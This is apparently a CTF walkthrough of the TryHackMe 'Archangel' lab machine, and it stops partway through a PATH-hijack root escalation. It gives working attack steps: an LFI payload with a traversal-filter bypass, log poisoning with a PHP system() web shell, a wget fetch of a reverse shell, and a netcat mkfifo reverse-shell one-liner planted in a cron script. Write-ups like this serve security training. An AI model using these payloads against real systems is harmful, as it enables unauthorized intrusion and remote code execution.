TryHackMe-Archangel

6 min readFeb 5, 2021

Room link :: https://tryhackme.com/room/archangel

Overview

Easy rated boot2root machine at TryHackMe, created by Archangel.This easy machine uses Virtual Domain Name Hosting. Once the correct domain has been found, you need to exploit PHP include() function to get LFI and then to get a reverse shell. After getting reverse shell, you need to exploit cronjob to gain privilege as user. To gain privilege as root you need to exploit PATH variable.

Enumeration

Carry out basic nmap scan with the following command

$ nmap -A <machine-IP>

We can see that two ports are open on the machine. 22 and 80 which are standard SSH and HTTP ports.

Let’s take a look at the webpage. At the top of the website you can find a domain name mafialive.thm

Lets add this domain in our /etc/hostsfile pointing to the IP of the machine.

Visit the webpage with host name. We will get our first flag on the home page.

Further analyzing the website we could find robots.txt, which restrict access to sensitive data such as admin webpages or assets from web crawlers.

Visiting robots.txt we can find a php file, test.php

Accessing test.php provides the following content.

After clicking the button in the webpage, we can find that it redirects to nmap mrrobot.php in the direcory /var/www/html/development_testing

This url hints the possibility of Local File Inclusion vulnerability. After trying to access sensitive files like /etc/passwd and access.log files by passing the value to view parameter, we could find that the php filter present restricts us from accessing those files. Actual contents of the file can be viewed by parsing the content into base64, as PHP has a inbuilt function to convert normal text to base64. Using the below payload we could read the contents of test.php in base64.

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

We got the base64 encoded php file. We need to decode it, either we can use online decryptors or we can decode using the following command in terminal.

$ echo "encoded-string" | base64 -d

This gives us the content of test.php and also the second flag.

Checking the php file, we could find that the code is checking two conditions,

Condition 1

if(!containsStr($_GET['view'], '../..')

condition 1 restricts path traversal

Condition 2

if(!containsStr($_GET['view'], '/var/www/html/development_testing'))

condition 2 states that anything we do is restricted to a single location. ie, /var/www/html/development_testing

We can bypass the path traversal protection by using “.././../” instead of “../../” to travel back directories. Reading the access.log file in /var/log/apache2/ shows that the User-Agent is being logged. So we can get an RCE using log poisoning attack.

Now let’s try to access the log ile,

view=/var/www/html/development_testing/.././.././../log/apache2/access.log

We are able to access access.log file, now it’s time to exploit the server using log poisoning attack to gain shell.

Let’s pass a malicious php code snippet in the User-Agent header.

<?php system($_GET['cmd']); ?>

Use burpsuite to intercept the request and pass the malicious php code snippet in the user-agent value.

Now we can pass linux commands in access.log file, let’s verify using the below command

view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=id

We can see that our malicious code is working.

Gaining Foothold

Now let’s upload our php reverse shell using burpsuite. Reverse shell can be found here https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Change IP and PORT where it says //CHANGE THIS, start a python server using $ python3 -m http.server 8000

Upload the shell on target machine using wget and burpsuite. Using

view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget http://<machine-ip>:8000/shell.php

Now let’s start our netcat listener on our local machine on your specified port.

$ nc -nvlp 1337

Trigger the shell by visiting mafialive.thm/shell.php

Upgrade to a stable shell using the following commands

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm

Once we are inside the machine we can find the user.txt under /home/archangel directory.

Post Exploitation Enumeration

Manually enumerating checking for sudo permissions, SUID binaries and cron jobs, we find an interesting scheduled task which runs every minute as user archangel.

$ cat /etc/crontab

Checking file permissions using

$ ls -la

We can read and write the file. And the file contained a simple bash command echoing “hello world” inside /opt/backupfiles/helloworld.txt

Let’s insert a onliner reverse shell in helloworld.sh using the following command.

$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local-machine-ip> 4444 >/tmp/f" >> helloworld.sh

Privilege Escalation

Start the netcat listener on your local machine and wait for few minutes.

Again upgrade your shell to a stable one with following commands.

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm

There is a flag that we already got, and also a folder secret in the home direcory. Changing directory to secret gives us the flag for user2.

Also there is a binary called backup which has an SUID bit set, let’s start a webserver in the remote machine and download this binary to our local machine using wget using the commands,

starting webserver

$ python3 -m http.server 8001

downloading binary using wget

$ wget http://<remote-machine-ip>:8001/backup

Analyze the binary using Ghidra, we get the following in function main

The binary was executing commands to copy files from one directory to another, also the binary was running as root. This mean that if we can replace the systemcp binary with our own, Then we can have root access.

Let’s create our own binary named cpand point the $PATH to our directory.